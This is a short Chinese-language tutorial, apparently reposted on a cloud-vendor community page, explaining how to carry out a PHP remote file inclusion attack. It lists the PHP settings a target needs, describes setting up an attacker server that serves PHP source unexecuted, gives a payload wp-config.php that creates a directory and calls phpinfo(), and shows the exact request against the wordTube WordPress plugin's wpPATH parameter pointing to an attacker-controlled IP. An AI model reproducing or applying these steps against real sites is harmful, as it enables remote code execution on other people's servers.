修改部分php配置實現 遠程包含 攻擊

來源:互聯網
上載者:User
 

1. 調試期間,可以開啟display_errors = On

2. 目標機使用了include、require或require_once3. 目標機配置  a) register_globals = On  b) allow_url_fopen = On  c) allow_url_include = On這樣的目標就可以進行攻擊了 自己搭建簡易的伺服器,apache + php 即可修改httpd.conf中,將尾碼為php的,從而避免代碼在攻擊端就被執行,#AddType application/x-httpd-php .php .html .htm 根據漏洞代碼,產生對應的環境,例如:if (!$_POST) $wppath=$_GET['wpPATH'];else $wppath=$_POST['wpPATH'];require_once($wppath.'/wp-config.php'); 我們就可以建立一個可訪問的檔案夾bad_guy,增加讀許可權order allow,deny allow from all ,然後在裡面建立一個wp-config.php

<?php        mkdir('c:\exploit');        phpinfo();        exit;?>

~然後請求一下就行了

/wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://10.67.1.30/bad_guy

來張:

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.